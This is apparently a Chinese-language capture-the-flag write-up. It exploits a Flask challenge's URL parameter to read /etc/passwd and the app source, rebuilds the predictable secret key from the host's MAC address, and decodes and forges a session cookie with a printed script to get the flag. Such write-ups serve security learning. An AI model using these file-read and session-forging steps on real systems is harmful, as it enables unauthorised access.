点击readsomething后链接到了百度,同时url里多了url参数,猜测存在任意文件读取。
尝试/etc/passwd
成功读取,读取/proc/self/cmdline
查看当前进程
知道是python的后台,源码在/api/app.py
下,读源码
# encoding:utf-8
import re, random, uuid, urllib
from flask import Flask, session, request
app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True
@app.route('/')
def index():
session['username'] = 'www-data'
return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'
@app.route('/read')
def read():
try:
url = request.args.get('url')
m = re.findall('^file.*', url, re.IGNORECASE)
n = re.findall('flag', url, re.IGNORECASE)
if m or n:
return 'No Hack'
res = urllib.urlopen(url)
return res.read()
except Exception as ex:
print str(ex)
return 'no response'
@app.route('/flag')
def flag():
if session and session['username'] == 'fuck':
return open('/flag.txt').read()
else:
return 'Access denied'
if __name__=='__main__':
app.run(
debug=True,
host="0.0.0.0"
)
很明显是一道flask-session题,在/flag路由 能得到flag,现在的问题是要找到secret_key
app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True
random指定了seed那么生成的随机数是固定的,查看uuid.getnode()
会获取当前的mac地址。我们读取/sys/class/net/eth0/address
得到了mac地址02:42:ac:10:a9:06
即0x0242ac10a906
用python2获得key
先用脚本解码我们原来的session
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)
decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True
try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')
if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')
return session_json_serializer.loads(payload)
if __name__ == '__main__':
s = "eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDNMV1JoZEdFPSJ9fQ.YJS5GQ.c-7rnz5YVqHA2e3GxPboKPlXDlU"
print(decryption(s.encode()))
得到{'username': b'www-data'}
,改为{'username': b'fuck'}
,用flask-session插件配合秘钥加密。
配合我们得到的session访问/flag页面拿到flag